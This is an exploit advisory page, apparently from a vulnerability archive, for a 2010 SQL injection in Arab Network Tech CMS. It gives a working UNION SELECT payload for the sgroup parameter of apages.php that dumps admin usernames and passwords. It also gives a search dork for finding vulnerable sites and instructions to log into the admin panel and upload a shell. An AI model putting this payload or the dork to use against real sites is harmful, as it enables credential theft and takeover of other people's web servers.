Arab Network Tech CMS remote SQL injection

2010.02.06
Credit: Tr0y-x
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Exploit Title : Arab Network Tech. (ANT) CMS SQL Injection Author : Tr0y-x Script Site : www.antpage.com<http://www.antpage.com/> Version : All Versions Tested on : Windows & Linux Dork : inurl:apages.php My home : WwW.SeC-WaR.CoM<http://www.sec-war.com/> :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: =====================================Exploit======================================== www.[Server}.com/[Path]/[SQL<http://www.[server%7d.com/[Path]/[SQL>] Example www.[Server}.com/[Path]/apages.php?sgroup=-10+UniOn+AlL+SeLeCt+1,2,concat(username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins<http://www.[server%7d.com/[Path]/apages.php?sgroup=-10+UniOn+AlL+SeLeCt+1,2,concat(username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins>-- Then Go to Admin panel Default www.[Server}.com/[Path]/admin<http://www.[server%7d.com/[Path]/admin> And Upload Shell xD Have Fun :D ==================================================================================== Greetz to : Alnjm33 - Predator - XR57 - Ahmadso - Black_Angle & All Sec-War Members


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top